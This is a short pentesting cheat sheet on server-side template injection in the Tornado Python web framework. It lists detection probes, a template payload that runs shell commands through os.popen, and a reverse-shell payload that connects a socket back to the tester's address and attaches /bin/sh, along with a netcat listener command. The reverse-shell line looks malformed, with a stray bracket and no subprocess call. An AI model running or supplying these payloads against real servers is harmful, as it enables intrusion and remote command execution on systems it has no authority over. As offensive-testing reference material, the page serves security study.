Tornado Pentesting

Last modified: 2023-05-28


Tornado is a Python web server and web application framework.

Server-Side Template Injection (SSTI)

We can execute arbitrary Python script using the server-site template injection.
First check if the script will be executed as below.

<title>Website by {{ 2*3 }}</title>
<span>{{ 2*3 }}</span>

# URL parameters{{2*3}}

If the website shows 6 instead of 2*3, we can execute arbitrary code.
Try following payloads.

{% import os %}{{ os.popen("whoami").read() }}

# Reverse shell. Replace "" with your own ip 
# It requires a listener like `nc -lvnp 4444` in local terminal.
{% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]) }}